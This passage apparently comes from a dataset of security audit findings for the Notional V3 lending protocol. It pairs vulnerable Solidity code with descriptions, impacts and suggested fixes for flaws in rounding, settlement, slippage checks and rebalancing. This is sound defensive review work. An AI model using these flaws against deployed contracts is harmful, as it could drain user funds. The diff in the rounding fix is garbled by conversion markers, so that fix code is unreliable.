require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n\\nConsider the following example:\\nAlice has a valid borrow position in the vault which is considered risky. She has a small bit of secondary cash but most of her debt is primary currency denominated. Generally speaking her vault is healthy. Upon settlement, the small bit of excess secondary cash is transferred out and her vault is undercollateralised and eligible for liquidation. However, we are deadlocked because it is not possible to settle the vault because `checkVaultAccountCollateralRatio()` will fail, and it's not possible to purchase the excess cash and offset the debt directly via `liquidateVaultCashBalance()` or `deleverageAccount()` because `_authenticateDeleverage()` will revert if a vault has not yet been settled.чConsider adding a liquidation method which settles a vault account and allows for a liquidator to purchase vault shares, offsetting outstanding debt, before performing collateral ratio checks.чVault accounts can create positions which will never be eligible for liquidation and the protocol may accrue bad debt.ч```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this 
method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n -convertFromStorage() fails to use rounding-up when converting a negative storedCashBalance into signedPrimeSupplyValue.чmediumч`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`.\\n`convertFromStorage()` is used to convert `storedCashBalance` into `signedPrimeSupplyValue`. When `storedCashBalance` is negative, it represents a debt - positive prime cash owed.\\nUnfortunately, when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`, the following division will apply a rounding-down (near zero) mode, leading to a user to owe less than it is supposed to be.\\n```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n\\nThis is not acceptable. 
Typically, rounding should be in favor of the protocol, not in favor of the user to prevent draining of the protocol and losing funds of the protocol.\\nThe following POC shows a rounding-down will happen for a negative value division. The result of the following test is -3.\\n```\\nfunction testMod() public {\\n \\n int256 result = -14;\\n result = result / 4;\\n console2.logInt(result);\\n }\\n```\\nчUse rounding-up instead.\\n```\\nfunction convertFromStorage(\\n PrimeRate memory pr,\\n int256 storedCashBalance\\n ) internal pure returns (int256 signedPrimeSupplyValue) {\\n if (storedCashBalance >= 0) {\\n return storedCashBalance;\\n } else {\\n // Convert negative stored cash balance to signed prime supply value\\n // signedPrimeSupply = (negativePrimeDebt * debtFactor) / supplyFactor\\n\\n // cashBalance is stored as int88, debt factor is uint80 * uint80 so there\\n // is no chance of phantom overflow (88 // Add the line below\\n 80 // Add the line below\\n 80 = 248) on mul\\n// Remove the line below\\n return storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n// Add the line below\\n return (storedCashBalance.mul(pr.debtFactor).sub(pr.supplyFactor// Remove the line below\\n1)).div(pr.supplyFactor);\\n }\\n }\\n```\\nч`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`. The protocol is losing some dusts amount, but it can be accumulative or a vulnerability that can be exploited.ч```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n -Cannot permissionless settle the vault account if the user use a blacklisted accountчmediumчCannot permissionless settle the vault account if the user use a blacklisted account\\nIn VaultAccoutnAction.sol, one of the critical function is\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. 
This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nas the comment suggests, this function should be called permissionless\\nand the comment is, which means there should not be able to permissionless reject account settlement\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nthis is calling\\n```\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n```\\n\\nwhich calls\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. 
All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n```\\n\\nbasically this calls\\n```\\n // Calculates the net settled cash if there is any temp cash balance that is net off\\n // against the settled prime debt.\\n bool didTransferPrimary;\\n (accountPrimeStorageValue, didTransferPrimary) = repayAccountPrimeDebtAtSettlement(\\n vaultConfig.primeRate,\\n primeVaultState,\\n vaultConfig.borrowCurrencyId,\\n vaultConfig.vault,\\n vaultAccount.account,\\n vaultAccount.tempCashBalance,\\n accountPrimeStorageValue\\n );\\n```\\n\\ncalling\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if 
(netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n```\\n\\nthe token withdrawal logic above try to push ETH to accout\\n```\\nTokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n);\\n```\\n\\nthis is calling\\n```\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, 
withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nnote the function call\\n```\\nif (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n} else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n}\\n```\\n\\nif the token type is not ETHER,\\nwe are transfer the underlying ERC20 token to the account\\n```\\nGenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n```\\n\\nthe token in-scoped is\\n```\\nERC20: Any Non-Rebasing token. ex. USDC, DAI, USDT (future), wstETH, WETH, WBTC, FRAX, CRV, etc.\\n```\\n\\nUSDC is common token that has blacklisted\\nif the account is blacklisted, the transfer would revert and the account cannot be settled!чmaybe let admin bypass the withdrawPrimeCash and force settle the account to not let settlement block further action!чwhat are the impact,\\nper comment\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nif that is too vague, I can list three, there are more!\\nthere are certain action that need to be done after the vault settlement, for example, liqudation require the vault settlement first\\nthere are case that require force vault settlement, actually one example is notional need to force the settle the vault during migration! (this is just the case to show user should be able to permissionless reject settlement)ч```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. 
In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. 
If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n -getAccountPrimeDebtBalance() always return 0чmediumчA spelling error results in `getAccountPrimeDebtBalance()` always returning 0\\n`getAccountPrimeDebtBalance()` is used to show the current debt\\n```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n\\nIn the above code we can see that due to a spelling error, `debtBalance` is always == 0; it should use `debtBalance = cashBalance < 0 ? cashBalance : 0;`ч```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n- debtBalance = cashBalance < 0 ? debtBalance : 0;\\n+ debtBalance = cashBalance < 0 ? 
cashBalance : 0;\\n }\\n```\\nч`getAccountPrimeDebtBalance()` is the external method to check the debt. If a third party integrates with the Notional protocol, this method will be used to determine whether the user has debt or not and handle it accordingly, which may lead to serious errors in the third party's businessч```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n -A single external protocol can DOS rebalancing processчmediumчA failure in an external money market can DOS the entire rebalance process in Notional.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n\\nDuring a rebalance, the `ProportionalRebalancingStrategy` will loop through all the holdings and perform a deposit or redemption against the external market of 
the holdings.\\nAssume that Notional integrates with four (4) external money markets (Aave V2, Aave V3, Compound V3, Morpho). In this case, whenever a rebalance is executed, Notional will interact with all four external money markets.\\n```\\nFile: TreasuryAction.sol\\n function _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n..SNIP..\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\n```\\nFile: TokenHandler.sol\\n function executeMoneyMarketRedemptions(\\n..SNIP..\\n for (uint256 j; j < data.targets.length; j++) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n```\\n\\nHowever, as long as one external money market reverts, the entire rebalance process will be reverted and Notional would not be able to rebalance its underlying assets.\\nThe call to the external money market can revert due to many reasons, which include the following:\\nChanges in the external protocol's interfaces (e.g. function signatures modified or functions added or removed)\\nThe external protocol is paused\\nThe external protocol has been compromised\\nThe external protocol suffers from an upgrade failure causing an error in the new contract code.чConsider implementing a more resilient rebalancing process that allows for failures in individual external money markets. For instance, Notional could catch reverts from individual money markets and continue the rebalancing process with the remaining markets.чNotional would not be able to rebalance its underlying holding if one of the external money markets causes a revert. 
The probability of this issue occurring increases whenever Notional integrates with a new external money market.\\nThe key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its funds out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n -Inadequate 
slippage controlчmediumчThe current slippage control mechanism checks a user's acceptable interest rate limit against the post-trade rate, which could result in trades proceeding at rates exceeding the user's defined limit.\\n```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n\\nWhen executing a fCash trade, the interest rate is computed based on the utilization of the current market (Refer to Line 432). The `postFeeInterestRate` is then computed based on the `preFeeCashToAccount` and trading fee, and this rate will be used to derive the exchange rate needed to convert `fCashToAccount` to the net prime cash (postFeeCashToAccount).\\nNote that the interest rate used for the trade is `postFeeInterestRate`, and `postFeeCashToAccount` is the amount of cash credit or debit to an account.\\nIf there is any slippage control in place, the slippage should be checked against the `postFeeInterestRate` or `postFeeCashToAccount`. 
As such, there are two approaches to implementing slippage controls:\\n1st Approach - The current interest rate is `2%`. User sets their acceptable interest rate limit at 3% when the user submits the trade transaction. The user's tolerance is `1%`. From the time the trade is initiated to when it's executed, the rate (postFeeInterestRate) rises to 5%, the transaction should revert due to the increased slippage beyond the user's tolerance.\\n2nd Approach - If a user sets the minimum trade return of 1000 cash, but the return is only 900 cash (postFeeCashToAccount) when the trade is executed, the transaction should revert as it exceeded the user's slippage tolerance\\nNote: When users submit a trade transaction, the transaction is held in the mempool for a period of time before executing, and thus the market condition and interest rate might change during this period, and slippage control is used to protect users from these fluctuations.\\nHowever, within the codebase, it was observed that the slippage was not checked against the `postFeeInterestRate` or `postFeeCashToAccount`.\\n```\\nFile: InterestRateCurve.sol\\n // returns the net cash amounts to apply to each of the three relevant balances.\\n (\\n int256 netUnderlyingToAccount,\\n int256 netUnderlyingToMarket,\\n int256 netUnderlyingToReserve\\n ) = _getNetCashAmountsUnderlying(\\n irParams,\\n market,\\n cashGroup,\\n totalCashUnderlying,\\n fCashToAccount,\\n timeToMaturity\\n );\\n..SNIP..\\n {\\n // Do not allow utilization to go above 100 on trading, calculate the utilization after\\n // the trade has taken effect, meaning that fCash changes and cash changes are applied to\\n // the market totals.\\n market.totalfCash = market.totalfCash.subNoNeg(fCashToAccount);\\n totalCashUnderlying = totalCashUnderlying.add(netUnderlyingToMarket);\\n\\n uint256 utilization = getfCashUtilization(0, market.totalfCash, totalCashUnderlying);\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0);\\n\\n uint256 
newPreFeeImpliedRate = getInterestRate(irParams, utilization);\\n..SNIP..\\n // Saves the preFeeInterestRate and fCash\\n market.lastImpliedRate = newPreFeeImpliedRate;\\n }\\n```\\n\\nAfter computing the net prime cash (postFeeCashToAccount == netUnderlyingToAccount) at Line 373 above, it updates the `market.totalfCash` and `totalCashUnderlying`. Line 395 computes the `utilization` after the trade happens, and uses the latest `utilization` to compute the new interest rate after the trade and save it within the `market.lastImpliedRate`\\n```\\nFile: TradingAction.sol\\n function _executeLendBorrowTrade(\\n..SNIP..\\n cashAmount = market.executeTrade(\\n account,\\n cashGroup,\\n fCashAmount,\\n market.maturity.sub(blockTime),\\n marketIndex\\n );\\n\\n uint256 rateLimit = uint256(uint32(bytes4(trade << 104)));\\n if (rateLimit != 0) {\\n if (tradeType == TradeActionType.Borrow) {\\n // Do not allow borrows over the rate limit\\n require(market.lastImpliedRate <= rateLimit, \"Trade failed, slippage\");\\n } else {\\n // Do not allow lends under the rate limit\\n require(market.lastImpliedRate >= rateLimit, \"Trade failed, slippage\");\\n }\\n }\\n }\\n```\\n\\nThe trade is executed at Line 256 above. After the trade is executed, it will check for the slippage at Line 264-273 above.\\nLet $IR_1$ be the interest rate used during the trade (postFeeInterestRate), $IR_2$ be the interest rate after the trade (market.lastImpliedRate), and $IR_U$ be the user's acceptable interest rate limit (rateLimit).\\nBased on the current slippage control implementation, $IR_U$ is checked against $IR_2$. Since the purpose of having slippage control in DeFi trade is to protect users from unexpected and unfavorable price changes during the execution of a trade, $IR_1$ should be used instead.\\nAssume that at the time of executing a trade (TradeActionType.Borrow), $IR_1$ spikes up and exceeds $IR_U$. 
However, since the slippage control checks $IR_U$ against $IR_2$, which may have resettled to $IR_U$ or lower, the transaction proceeds despite exceeding the user's acceptable rate limit. So, the transaction succeeds without a revert.\\nThis issue will exacerbate when executing large trades relative to pool liquidity.чConsider updating the slippage control to compare the user's acceptable interest rate limit (rateLimit) against the interest rate used during the trade execution (postFeeInterestRate).чThe existing slippage control does not provide the desired protection against unexpected interest rate fluctuations during the transaction. As a result, users might be borrowing at a higher cost or lending at a lower return than they intended, leading to losses.ч```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n -Inconsistent use of `VAULT_ACCOUNT_MIN_TIME` in vault implementationчmediumчThere is a considerable difference in implementation behaviour 
when a vault has yet to mature compared to after vault settlement.\\nThere is some questionable functionality with the following `require` statement:\\n```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n\\nThe `lastUpdateBlockTime` variable is updated in two cases:\\nA user enters a vault position, updating the vault state; including `lastUpdateBlockTime`. This is a proactive measure to prevent users from quickly entering and exiting the vault.\\nThe vault has matured and as a result, each time vault fees are assessed for a given vault account, `lastUpdateBlockTime` is updated to `block.timestamp` after calculating the pro-rated fee for the prime cash vault.\\nTherefore, before a vault has matured, it is not possible to quickly enter and exit a vault. But after `Constants.VAULT_ACCOUNT_MIN_TIME` has passed, the user can exit the vault as many times as they like. However, the same does not hold true once a vault has matured. Each time a user exits the vault, they must wait `Constants.VAULT_ACCOUNT_MIN_TIME` time again to re-exit. This seems like inconsistent behaviour.чIt might be worth adding an exception to `VaultConfiguration.settleAccountOrAccruePrimeCashFees()` so that when vault fees are calculated, `lastUpdatedBlockTime` is not updated to `block.timestamp`.чThe `exitVault()` function will ultimately affect prime and non-prime vault users differently. 
It makes sense for the codebase to be written in such a way that functions execute in-line with user expectations.ч```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n -Return data from the external call not verified during deposit and redemptionчmediumчThe deposit and redemption functions did not verify the return data from the external call, which might cause the contract to wrongly assume that the deposit/redemption went well although the action has actually failed in the background.\\n```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n\\nWhen the external call within the `GenericToken.executeLowLevelCall` function reverts, the `status` returned from the `.call` will be `false`. In this case, Line 69 above will revert.\\n```\\nFile: TreasuryAction.sol\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\nFor deposit and redeem, Notional assumes that all money markets will revert if the deposit/mint and redeem/burn has an error. Thus, it does not verify the return data from the external call. Refer to the comment in Line 317 above.\\nHowever, this is not always true due to the following reasons:\\nSome money markets might not revert when errors occur but instead return `false (0)`. 
In this case, the current codebase will wrongly assume that the deposit/redemption went well although the action has failed.\\nCompound might upgrade its contracts to return errors instead of reverting in the future.чConsider checking the `returnData` to ensure that the external money market returns a successful response after deposit and redemption.\\nNote that the successful response returned from various money markets might be different. Some protocols return `1` on a successful action, while Compound return zero (NO_ERROR).чThe gist of prime cash is to integrate with multiple markets. Thus, the codebase should be written in a manner that can handle multiple markets. Otherwise, the contract will wrongly assume that the deposit/redemption went well although the action has actually failed in the background, which might potentially lead to some edge cases where assets are sent to the users even though the redemption fails.ч```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n -Treasury rebalance will fail due to interest accrualчmediumчIf Compound has updated their interest rate model, then Notional will calculate the before total underlying token balance without accruing interest. 
